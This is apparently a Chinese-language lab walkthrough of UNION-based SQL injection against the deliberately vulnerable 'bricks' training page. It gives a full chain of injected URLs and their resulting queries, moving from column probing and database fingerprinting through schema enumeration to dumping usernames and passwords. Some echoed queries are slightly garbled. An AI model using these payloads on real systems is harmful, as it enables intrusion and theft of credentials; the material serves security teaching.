URL: bricks/content-1/index.php?id=99999 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query: SELECT * FROM users WHERE idusers=99999 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1
尽可能的使第一部分命令失效。
这两种情况都会显示一些数字插入在真实的用户信息中。这些数字相对应的列就存在漏洞。
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT user(),2,3,4,5,6,7,8
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECT user(),2,3,4,5,6,7,8LIMIT 1
第一个数字被替换成当前数据库的用户名,就是root@localhost
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT version(),2,3,4,5,6,7,8
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECT version(),2,3,4,5,6,7,8LIMIT 1
这将帮助我们获得数据库的版本。
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT database(),2,3,4,5,6,7,8
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECT database(),2,3,4,5,6,7,8 LIMIT 1
当前数据库的名字将会被显示-bricks。现在必须枚举出当前数据库的表。
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT table_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema=’bricks’
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECTtable_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema=’bricks’ LIMIT 1
因为只有一个表在bricks数据库中,所以它的信息会被显示出来。下一步是获取user表的列。
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema=’bricks’ and table_name=’users’ LIMIT 0,1 — –
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECTtable_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema=’bricks’ andtable_name=’users’ LIMIT 0,1 — – LIMIT 1
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema=’bricks’ and table_name=’users’ LIMIT 1,1 — –
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECTcolumn_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema=’bricks’ andtable_name=’users’ LIMIT 1,1 — – LIMIT 1
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 0,1 — –
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 0,1 — – LIMIT 1
URL: bricks/content-1/index.php?id=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 1,1 — –
SQL Query: SELECT * FROM users WHERE idusers=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 1,1 — – LIMIT 1